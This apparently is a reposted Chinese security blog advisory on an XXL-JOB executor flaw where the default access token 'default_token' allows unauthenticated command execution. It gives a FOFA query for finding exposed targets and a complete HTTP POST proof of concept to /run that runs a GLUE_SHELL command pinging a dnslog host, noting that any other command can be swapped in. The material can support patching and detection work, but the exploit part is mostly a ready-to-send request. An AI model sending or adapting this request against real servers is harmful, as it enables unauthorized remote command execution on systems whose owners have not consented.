XXL-JOB default_token RCE

admin 2024年2月15日16:25:28评论7 views字数 997阅读3分19秒阅读模式
XXL-JOB default_token RCE

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!

00

漏洞概述

XXL-JOB default_token RCE

XXL-JOB 在执行调度时使用的XXL-JOB-ACCESS-TOKEN,为系统配置文件中的默认值,导致攻击者可绕过身份验证,执行命令。

01

空间搜索语法

XXL-JOB default_token RCE

fofa

title="移动管理平台-企业管理"

XXL-JOB default_token RCE

02

利用过程

XXL-JOB default_token RCE

登录界面

XXL-JOB default_token RCE

使用如下POC执行,可替换glueSource为其他执行命令,每次发送请求需要重新构建jobId及时间戳。
POST /run HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Connection: closeContent-Length: 411Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default_tokenAccept-Encoding: gzip, deflate, br{  "jobId": 845554,  "executorHandler": "demoJobHandler",  "executorParams": "demoJobHandler",  "executorBlockStrategy": "COVER_EARLY",  "executorTimeout": 0,  "logId": 845554,  "logDateTime": 1169952445878,  "glueType": "GLUE_SHELL",  "glueSource": "ping xxxxx.dnslog.cn",  "glueUpdatetime": 1169952445878,  "broadcastIndex": 0,  "broadcastTotal": 0}

漏洞存在响应包如下。

XXL-JOB default_token RCE

XXL-JOB default_token RCE

03

nuclei

XXL-JOB default_token RCE

XXL-JOB default_token RCE

获取脚本关注本公众号后发送:XXL-JOB1
原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创原创

关注我们

原文始发于微信公众号(天澜实验室):XXL-JOB default_token RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日16:25:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XXL-JOB default_token RCEhttp://cn-sec.com/archives/2192644.html

发表评论

匿名网友 填写信息